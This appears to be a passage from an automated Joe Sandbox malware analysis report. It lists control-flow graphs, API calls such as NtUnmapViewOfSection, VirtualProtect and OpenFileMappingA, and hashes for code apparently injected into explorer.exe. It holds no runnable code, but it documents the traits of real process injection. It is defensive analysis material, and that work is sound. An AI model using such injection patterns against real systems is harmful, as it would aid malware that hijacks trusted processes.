35->31 36 Function_000E19BC 37 Function_000E2FBC 37->27 38->40 38->71 82 Function_000E20F4 38->82 39 Function_000E1938 39->40 39->71 41 Function_000E14B2 42 Function_000EAAB0 43 Function_000EABCF 44 Function_000E1C4C 45 Function_000EC14A 46 Function_000EB148 47->6 47->8 47->9 47->22 47->29 47->32 47->36 47->40 47->44 47->62 47->71 74 Function_000E1BF8 47->74 49->40 50 Function_000EB2DF 51 Function_000E1FDC 51->40 75 Function_000E18F8 51->75 52 Function_000EB15B 53 Function_000E3158 54 Function_000EB358 54->31 55 Function_000EABD7 56 Function_000E1254 57 Function_000E14D4 59 Function_000EAAD2 61 Function_000E156C 63 Function_000EADEA 65->34 67 Function_000E3068 67->27 67->39 67->40 67->62 67->71 68 Function_000EA8E8 69 Function_000E2664 70 Function_000EAFE3 71->62 72 Function_000E1560 73 Function_000E1EFA 76->11 76->62 76->69 78 Function_000E14F9 79 Function_000E5579 80 Function_000E1576 81 Function_000EAFF6 82->1 82->2 82->28 82->36 82->40 82->51 82->60 82->71 82->75

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 116 e370c-e371c call e1c6c 119 e3722-e3754 call e1838 116->119 120 e37b0-e37b5 116->120 124 e3756-e375b call e1838 119->124 125 e3785-e37aa NtUnmapViewOfSection 119->125 127 e3760-e3779 124->127 129 e37bc-e37cb call e34c4 125->129 130 e37ac-e37ae 125->130 127->125 135 e37cd-e37d0 call e370c 129->135 136 e37d5-e37de 129->136 130->120 132 e37b6-e37bb call e31ac 130->132 132->129 135->136
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E378C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                        • Instruction ID: 4f1156a7facc9e97d658a34bc3cb6b47269a29ccbf94109271c4d97308bcea68
                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                        • Instruction Fuzzy Hash: 7911EB746169494FFB6CFB79989D3B537E2FB14312F54402DE855C72A2DE39CA818700

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 eb4a8-eb4ab 1 eb4b5-eb4b9 0->1 2 eb4bb-eb4c3 1->2 3 eb4c5 1->3 2->3 4 eb4ad-eb4b3 3->4 5 eb4c7 3->5 4->1 6 eb4ca-eb4d1 5->6 8 eb4dd 6->8 9 eb4d3-eb4db 6->9 8->6 10 eb4df-eb4e2 8->10 9->8 11 eb4f7-eb504 10->11 12 eb4e4-eb4f2 10->12 26 eb51e-eb52c call eb46a 11->26 27 eb506-eb508 11->27 13 eb52e-eb549 12->13 14 eb4f4-eb4f5 12->14 15 eb57a-eb57d 13->15 14->11 17 eb57f-eb580 15->17 18 eb582-eb589 15->18 19 eb561-eb565 17->19 20 eb58f-eb593 18->20 24 eb54b-eb54e 19->24 25 eb567-eb56a 19->25 22 eb595-eb5ae LoadLibraryA 20->22 23 eb5f0-eb5f9 20->23 29 eb5af-eb5b6 22->29 33 eb5fc-eb605 23->33 24->18 30 eb550 24->30 25->18 31 eb56c-eb570 25->31 26->1 32 eb50b-eb512 27->32 29->20 35 eb5b8 29->35 36 eb551-eb555 30->36 31->36 37 eb572-eb579 31->37 50 eb51c 32->50 51 eb514-eb51a 32->51 38 eb62a-eb67a VirtualProtect * 2 33->38 39 eb607-eb609 33->39 41 eb5ba-eb5c2 35->41 42 eb5c4-eb5cc 35->42 36->19 43 eb557-eb559 36->43 37->15 40 eb67e-eb683 38->40 45 eb61c-eb628 39->45 46 eb60b-eb61a 39->46 40->40 47 eb685-eb694 40->47 48 eb5ce-eb5da 41->48 42->48 43->19 49 eb55b-eb55f 43->49 45->46 46->33 54 eb5dc-eb5e3 48->54 55 eb5e5-eb5ef 48->55 49->19 49->25 50->26 50->32 51->50 54->29
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 000EB5A7
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000EB651
                                                        • VirtualProtect.KERNELBASE ref: 000EB66F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000EA000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_ea000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                        • Instruction ID: f7358003556ff376e749192b7bc5dd04691651ad2956f887fb7b31e4195e77f6
                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                        • Instruction Fuzzy Hash: 35518A32754D9D4FCB24AA3E9CC43FAB7C1F755325B58063AC49AD3285E758C8468381

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 56 e34c4-e3527 call e1838 * 2 62 e352b-e3541 call e1bf8 56->62 65 e36fc-e3707 SleepEx 62->65 66 e3547-e355c call e1a88 62->66 65->62 69 e36ec-e36f7 call e1c4c 66->69 70 e3562-e3580 call e1a88 66->70 69->65 70->69 74 e3586-e358b 70->74 74->69 75 e3591-e35c4 call e1838 74->75 80 e35ca-e35e0 75->80 81 e36e4-e36e7 call e1860 75->81 84 e36d3-e36d5 80->84 81->69 85 e36db-e36dc 84->85 86 e35e5-e35fa 84->86 85->81 88 e36c5-e36cb 86->88 89 e3600-e3614 86->89 88->84 89->88 91 e361a-e3629 call e3394 89->91 91->88 94 e362f-e3638 call e1cac 91->94 94->88 97 e363e-e3647 call e1d04 94->97 97->88 100 e3649-e3650 call e1d24 97->100 100->88 103 e3652-e3660 call e1c6c 100->103 103->88 106 e3662-e36c0 call e19bc call e2a04 call e19bc 103->106 106->88
                                                        APIs
                                                          • Part of subcall function 000E1BF8: OpenFileMappingA.KERNEL32 ref: 000E1C0F
                                                          • Part of subcall function 000E1BF8: MapViewOfFile.KERNEL32 ref: 000E1C2E
                                                        • SysFreeMap.PGOCR ref: 000E36F7
                                                        • SleepEx.KERNEL32 ref: 000E3701
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$FreeMappingOpenSleepView
                                                        • String ID:
                                                        • API String ID: 4205437007-0
                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                        • Instruction ID: 761a8b7c1b817816f299ec55e78839af24da885bbda4d2937d8502c84ab9a70f
                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                        • Instruction Fuzzy Hash: F551A730208A488FDB59FF3AD85DAEA77E1EB94310F444619E45BD32A2DF38DA058781

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 113 e1bf8-e1c18 OpenFileMappingA 114 e1c1a-e1c38 MapViewOfFile 113->114 115 e1c3b-e1c48 113->115 114->115
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                        • Instruction ID: 3271ea4ec32d42c6c59079bbb4174db076aefa67609a15f3021a0ff69cd5a82f
                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                        • Instruction Fuzzy Hash: 50F01234314F4D4FAB45EF7D9C9C135B7E1EBA8202744857A985AC6165EF34C8458711